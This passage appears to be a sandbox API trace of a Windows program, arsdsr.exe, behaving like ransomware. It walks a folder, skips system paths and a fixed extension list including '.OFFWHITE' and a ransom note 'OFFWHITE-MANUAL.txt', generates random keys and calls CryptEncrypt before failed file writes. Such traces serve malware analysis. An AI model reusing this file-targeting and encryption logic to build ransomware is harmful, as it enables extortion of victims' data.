0x500000 [0144.017] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0144.017] GetProcessHeap () returned 0x500000 [0144.017] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0144.017] GetProcessHeap () returned 0x500000 [0144.017] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0144.017] GetProcessHeap () returned 0x500000 [0144.017] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0144.017] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.017] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.017] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0144.017] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.017] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.017] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0144.017] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.017] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.018] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.018] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.018] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.018] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.018] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.018] SetLastError (dwErrCode=0x0) [0144.018] WriteFile (in: hFile=0xffffffff, lpBuffer=0x525120, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.018] GetLastError () returned 0x6 [0144.018] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c5b0d9, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xc7c5b0d9, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xc7c5b0d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0144.018] lstrcmpiW (lpString1="behavior.xml", lpString2=".") returned 1 [0144.018] lstrcmpiW (lpString1="behavior.xml", lpString2="..") returned 1 [0144.018] lstrcmpiW (lpString1="behavior.xml", lpString2="...") returned 1 [0144.018] lstrcmpiW (lpString1="behavior.xml", lpString2="windows") returned -1 [0144.019] lstrcmpiW (lpString1="behavior.xml", lpString2="$recycle.bin") returned 1 [0144.019] lstrcmpiW (lpString1="behavior.xml", lpString2="rsa") returned -1 [0144.019] lstrcmpiW (lpString1="behavior.xml", lpString2="ntuser.dat") returned -1 [0144.019] lstrcmpiW (lpString1="behavior.xml", lpString2="programdata") returned -1 [0144.019] lstrcmpiW (lpString1="behavior.xml", lpString2="appdata") returned 1 [0144.019] lstrcmpiW (lpString1="behavior.xml", lpString2="program files") returned -1 [0144.019] lstrcmpiW (lpString1="behavior.xml", lpString2="program files (x86)") returned -1 [0144.019] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" [0144.019] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="behavior.xml" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" [0144.019] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.019] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.019] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0144.019] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0144.020] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0144.020] lstrcmpiW (lpString1="behavior.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.020] GetProcessHeap () returned 0x500000 [0144.020] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522290 [0144.020] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.022] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.022] GetProcessHeap () returned 0x500000 [0144.022] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315c0 [0144.022] GetProcessHeap () returned 0x500000 [0144.022] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315d8 [0144.023] GetProcessHeap () returned 0x500000 [0144.023] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525330 [0144.023] GetProcessHeap () returned 0x500000 [0144.023] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525438 [0144.023] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.023] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.023] SystemFunction036 (in: RandomBuffer=0x5315c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5315c0) returned 1 [0144.023] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.023] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.023] SystemFunction036 (in: RandomBuffer=0x5315d8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315d8) returned 1 [0144.023] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.023] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.023] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525330*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x525330*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.023] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.023] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.023] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525438*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x525438*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.024] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.024] SetLastError (dwErrCode=0x0) [0144.024] WriteFile (in: hFile=0xffffffff, lpBuffer=0x525330, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.024] GetLastError () returned 0x6 [0144.024] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="device.png", cAlternateFileName="")) returned 1 [0144.024] lstrcmpiW (lpString1="device.png", lpString2=".") returned 1 [0144.024] lstrcmpiW (lpString1="device.png", lpString2="..") returned 1 [0144.024] lstrcmpiW (lpString1="device.png", lpString2="...") returned 1 [0144.024] lstrcmpiW (lpString1="device.png", lpString2="windows") returned -1 [0144.024] lstrcmpiW (lpString1="device.png", lpString2="$recycle.bin") returned 1 [0144.024] lstrcmpiW (lpString1="device.png", lpString2="rsa") returned -1 [0144.024] lstrcmpiW (lpString1="device.png", lpString2="ntuser.dat") returned -1 [0144.024] lstrcmpiW (lpString1="device.png", lpString2="programdata") returned -1 [0144.024] lstrcmpiW (lpString1="device.png", lpString2="appdata") returned 1 [0144.024] lstrcmpiW (lpString1="device.png", lpString2="program files") returned -1 [0144.024] lstrcmpiW (lpString1="device.png", lpString2="program files (x86)") returned -1 [0144.024] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" [0144.024] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="device.png" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" [0144.024] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.024] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.024] PathFindExtensionW (pszPath="device.png") returned=".png" [0144.024] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0144.025] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0144.025] lstrcmpiW (lpString1="device.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0144.025] GetProcessHeap () returned 0x500000 [0144.025] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5222a0 [0144.025] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.025] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.025] GetProcessHeap () returned 0x500000 [0144.025] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315f0 [0144.026] GetProcessHeap () returned 0x500000 [0144.026] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531398 [0144.026] GetProcessHeap () returned 0x500000 [0144.026] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55c7e0 [0144.026] GetProcessHeap () returned 0x500000 [0144.026] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55c8e8 [0144.026] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.026] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.026] SystemFunction036 (in: RandomBuffer=0x5315f0, RandomBufferLength=0x10 | out: RandomBuffer=0x5315f0) returned 1 [0144.026] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.026] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.026] SystemFunction036 (in: RandomBuffer=0x531398, RandomBufferLength=0x10 | out: RandomBuffer=0x531398) returned 1 [0144.026] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.026] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.026] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55c7e0*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55c7e0*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.026] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.026] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.026] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55c8e8*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55c8e8*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.027] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.027] SetLastError (dwErrCode=0x0) [0144.027] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55c7e0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.027] GetLastError () returned 0x6 [0144.027] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0a07cc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0a07cc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0144.027] lstrcmpiW (lpString1="overlay.png", lpString2=".") returned 1 [0144.027] lstrcmpiW (lpString1="overlay.png", lpString2="..") returned 1 [0144.027] lstrcmpiW (lpString1="overlay.png", lpString2="...") returned 1 [0144.027] lstrcmpiW (lpString1="overlay.png", lpString2="windows") returned -1 [0144.027] lstrcmpiW (lpString1="overlay.png", lpString2="$recycle.bin") returned 1 [0144.027] lstrcmpiW (lpString1="overlay.png", lpString2="rsa") returned -1 [0144.027] lstrcmpiW (lpString1="overlay.png", lpString2="ntuser.dat") returned 1 [0144.027] lstrcmpiW (lpString1="overlay.png", lpString2="programdata") returned -1 [0144.027] lstrcmpiW (lpString1="overlay.png", lpString2="appdata") returned 1 [0144.028] lstrcmpiW (lpString1="overlay.png", lpString2="program files") returned -1 [0144.028] lstrcmpiW (lpString1="overlay.png", lpString2="program files (x86)") returned -1 [0144.028] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" [0144.028] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="overlay.png" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" [0144.028] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.028] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.028] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0144.028] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0144.028] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0144.028] lstrcmpiW (lpString1="overlay.png", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.028] GetProcessHeap () returned 0x500000 [0144.028] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x5222b0 [0144.029] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.029] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.029] GetProcessHeap () returned 0x500000 [0144.029] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5313c8 [0144.029] GetProcessHeap () returned 0x500000 [0144.029] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5313e0 [0144.029] GetProcessHeap () returned 0x500000 [0144.029] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55c9f0 [0144.029] GetProcessHeap () returned 0x500000 [0144.029] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55caf8 [0144.029] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.029] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.029] SystemFunction036 (in: RandomBuffer=0x5313c8, RandomBufferLength=0x10 | out: RandomBuffer=0x5313c8) returned 1 [0144.029] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.029] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.029] SystemFunction036 (in: RandomBuffer=0x5313e0, RandomBufferLength=0x10 | out: RandomBuffer=0x5313e0) returned 1 [0144.029] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.029] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.029] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55c9f0*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55c9f0*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.030] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.030] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.030] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55caf8*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55caf8*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.030] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.030] SetLastError (dwErrCode=0x0) [0144.030] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55c9f0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.030] GetLastError () returned 0x6 [0144.030] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0c6929, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0c6929, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x6a0068, dwReserved1=0x295dcf0, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0144.030] lstrcmpiW (lpString1="superbar.png", lpString2=".") returned 1 [0144.030] lstrcmpiW (lpString1="superbar.png", lpString2="..") returned 1 [0144.030] lstrcmpiW (lpString1="superbar.png", lpString2="...") returned 1 [0144.030] lstrcmpiW (lpString1="superbar.png", lpString2="windows") returned -1 [0144.030] lstrcmpiW (lpString1="superbar.png", lpString2="$recycle.bin") returned 1 [0144.031] lstrcmpiW (lpString1="superbar.png", lpString2="rsa") returned 1 [0144.031] lstrcmpiW (lpString1="superbar.png", lpString2="ntuser.dat") returned 1 [0144.031] lstrcmpiW (lpString1="superbar.png", lpString2="programdata") returned 1 [0144.031] lstrcmpiW (lpString1="superbar.png", lpString2="appdata") returned 1 [0144.031] lstrcmpiW (lpString1="superbar.png", lpString2="program files") returned 1 [0144.031] lstrcmpiW (lpString1="superbar.png", lpString2="program files (x86)") returned 1 [0144.031] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" [0144.031] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="superbar.png" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" [0144.031] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.031] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.031] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0144.031] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0144.031] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0144.032] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0144.032] lstrcmpiW (lpString1="superbar.png", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.032] GetProcessHeap () returned 0x500000 [0144.032] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e800 [0144.032] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.034] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.034] GetProcessHeap () returned 0x500000 [0144.035] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, 